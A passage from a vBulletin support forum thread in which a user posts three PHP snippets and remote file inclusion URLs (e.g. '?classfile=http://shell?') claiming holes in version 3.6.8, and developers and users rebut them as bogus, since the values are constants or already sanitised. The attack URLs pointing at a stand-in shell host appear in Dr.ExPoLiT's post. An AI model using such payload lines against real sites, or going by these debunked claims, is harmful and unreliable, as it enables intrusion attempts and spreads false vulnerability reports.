Announcement

Collapse
No announcement yet.

vBulletin Version 3.6.8 Vulnerabilities - Bogus

Collapse
This topic is closed.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Cyber Smoke
    replied
    Perhaps it's the one writing:

    || ############################### ||
    || # vBulletin - Remove License Number hacks## ||
    || ############################### ||



    But, before writing hacks, he'll have to learn how to spell the word "exploit".

    Leave a comment:


  • Mazinger
    replied
    Dr.ExPoLiT!

    Who are 'Arab vBulletin Team'?

    You're just distorting the image of Arab.

    Leave a comment:


  • slappy
    replied
    Actually, you were "wrong" when you "assumed" they were "exploitable"!



    Regards,

    Leave a comment:


  • Dr.ExPoLiT
    replied
    I am wrong when published here .

    good luck vbulletin team .

    Leave a comment:


  • Scott MacVicar
    replied
    None of your examples are even in the execution path and I've already explained in my first post to you where they were cleaned and how you can't exploit it.

    Feel free to post to securityfocus and I'll add your name and code to the non exploit page we keep for staff, I'm sure we'll enjoy seeing you mocked by your peers for not properly testing code never mind not understanding PHP.

    Leave a comment:


  • Dilly
    replied
    I think you missed the sarcasm.

    Leave a comment:


  • DelphiVillage
    replied
    Originally posted by aranthorn View Post
    How dare anyone question Dr.ExPoLiT, he's teh 1337!
    I dare what he posts is just rubbisch .... Scott already explained him there are no holes still he .... and everybody not even somebody who has no idea what PHP code is knows a comment is ignored by the PHP parser.Also you don't have to be verry smart to open a PHP file and search for the word "include" and think it's a hole.... (as Mike already mentioned)

    vBulletin has much work explaining all the wannabees on SecurityFocus that they are wrong i'm subscrided to that list so i know ....

    Leave a comment:


  • derekivey
    replied
    Are you saying that DIR can be changed? That is a constant that is set in the vB code somewhere with the full path to the forum. That cannot be exploited...

    Leave a comment:


  • Distance
    replied
    Rofl @ this thread

    Leave a comment:


  • Chousho
    replied
    Originally posted by Dr.ExPoLiT View Post
    ok Scott i tell you exploits
    ...
    So, you are patching your own forum when you find these exploits of course, right?

    Where are you getting these php files from, because the devs patch any holes found within a day or so.

    Leave a comment:


  • aranthorn
    replied
    How dare anyone question Dr.ExPoLiT, he's teh 1337!

    Seriously, if you think you've found an issue, the bug tracker is where it should be posted.

    Leave a comment:


  • Colin F
    replied
    As Scott said above, all these variables are checked or set previously in the code.

    Leave a comment:


  • Dr.ExPoLiT
    replied
    ok Scott i tell you exploits

    1st includes/class_paid_subscriptions.php line 621
    PHP Code:
        if (file_exists(DIR '/includes/paymentapi/class_' $methodinfo['classname'] . '.php')) 
            { 
                require_once(
    DIR '/includes/paymentapi/class_' $methodinfo['classname'] . '.php'); 
    hacker can upload shell [evil code]
    from http://site/forum/includes/class_paid_subscriptions.php=http://shell?
    ----------
    2nd
    includes/functions.php line 81

    PHP Code:
        if (preg_match('#^\w+$#'$classtype))
        {
            
    $classtype strtolower($classtype);
            if (
    $forcefile)
            {
                
    $classfile preg_replace('#[^a-z0-9_]#i'''$forcefile);
            }
            else
            {
                
    $classfile str_replace('_multiple'''$classtype);
            }
            require_once(
    DIR '/includes/class_dm_' $classfile '.php'); 
    http://site/forum/includes/functions.php?classfile=http://shell?
    ---------
    3nd
    includes/functions_cron.php line 276
    PHP Code:
             if ($nextrun build_cron_item($nextitem['cronid'], $nextitem))
            {
                include_once(
    DIR '/' $nextitem['filename']); 
            } 
    http://site/forum/includes/functions_cron.php?nextrun=http://shell?
    -------

    Is this sufficient or not

    If you side net send message and tell me what you now ok Scott MacVicar

    Next time I will be gaps in SecurityFocus

    good Luck.

    Leave a comment:


  • Dilly
    replied
    Haha. Top thread. Please move it to Chit Chat.

    Leave a comment:


  • Fusion
    replied
    Oy ve...

    Leave a comment:

Related Topics

Collapse

Working...
X